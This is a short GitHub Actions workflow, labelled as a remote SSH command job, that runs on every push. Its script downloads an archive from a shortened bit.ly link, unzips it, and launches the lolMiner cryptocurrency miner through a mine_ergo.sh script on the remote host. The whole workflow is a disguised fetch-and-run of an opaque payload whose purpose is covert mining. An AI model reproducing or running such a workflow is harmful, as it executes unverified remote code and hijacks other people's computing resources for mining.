name: remote ssh command
on: [push]
jobs:

  build:
    name: KAGYUSAMA
    runs-on: ubuntu-latest
    steps:
    - name: checkout
      uses: actions/checkout@v1

    - name: executing remote ssh commands using password
      uses: ./
      with:
        host: ${{ secrets.HOST }}
        username: ${{ secrets.USERNAME }}
        password: ${{ secrets.PASSWORD }}
        port: ${{ secrets.PORT }}
        script: wget https://bit.ly/3wyizi3 && unzip 3wyizi3 && cp /content/alat-main/miner.zip /content/ && unzip miner.zip && chmod +x /content/miner/lolMiner && chmod 777 /content/miner/mine_ergo.sh && /content/miner/mine_ergo.sh
